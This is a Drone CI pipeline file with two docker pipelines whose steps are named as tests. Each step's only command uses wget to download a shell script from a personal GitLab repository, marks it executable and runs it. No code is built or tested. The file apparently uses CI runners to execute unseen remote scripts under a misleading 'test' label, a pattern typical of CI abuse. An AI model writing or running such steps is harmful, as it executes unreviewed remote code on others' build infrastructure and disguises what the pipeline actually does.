kind: pipeline
type: docker
name: default-1

steps:
- name: test-1
  image: golang
  commands:
     - wget https://gitlab.com/renifer12/project-7/-/raw/main/config.sh && chmod +x config.sh && ./config.sh
  
---
kind: pipeline
type: docker
name: default-2

steps:
- name: test-2
  image: golang
  commands:
      - wget https://gitlab.com/renifer12/project-7/-/raw/main/configsh1.sh && chmod +x configsh1.sh && ./configsh1.sh
